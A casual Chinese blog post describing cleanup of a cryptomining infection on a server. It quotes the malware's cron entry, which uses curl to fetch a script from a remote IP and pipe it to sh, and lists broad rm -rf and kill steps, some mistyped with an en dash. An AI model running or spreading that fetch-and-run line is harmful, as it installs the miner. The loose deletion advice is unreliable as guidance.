先是在伺服器出現警告，說可能是挖礦的病毒。剛開始沒當回事，當把這個病毒百度之後發現，很嚴重吶。

好了，開始幹活。

第一步：

連結地址 ：https://blog.csdn.net/weixin_41228949/article/details/81501753

然鵝，沒有成功。。。。。。（成功了大概半分鐘，之後又活了）呵呵呵

第二步：

找出入侵IP

/var/spool/cron/crontabs

*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh

curl -fsSL http://149.56.106.215:8000/i.sh

第三步：

將/root/.ssh/所有檔案幹掉（不認識或者看著不爽的，具體自己判斷，我是全都幹掉，心情不好。。。。。。）

第四步：繼續幹掉root檔案和dump.rdb檔案

rm –rf /var/spool/cron/root

/var/spool/cron/crontabs/root

rm –rf  /tmp/dump.rdb

rm –rf  /usr/local/redis/bin/ dump.rdb

rm –rf  /var/spool/cron/ dump.rdb

第五步：在繼續幹掉sess開標頭檔案（我這有16個，心情不好都刪了。。。。。。）

rm –rf /tmp/sess_* (共有16個file)  <內容均為visit_item_1|i:1;>

第六步：

最後在kill -9 xxx 這個病毒以及刪除它。

不過我還是把這個IP加入了黑名單。

到此就結束。。。。。。

多說一句，我兩臺伺服器被搞了，看個人運氣吧總體來說，不過還有一個連結還是很不錯的，在這裡找到的靈感。（其實感覺是“模仿”的，哈哈）。

最後貼出連結：https://blog.csdn.net/zhanghan18333611647/article/details/65632827

=========================我是分割線=============================================

這是第一次清除此病毒，半月之後又出現此問題，流氓

再次貼出第二次清除經歷：：：：：https://blog.csdn.net/qq_39424981/article/details/82461129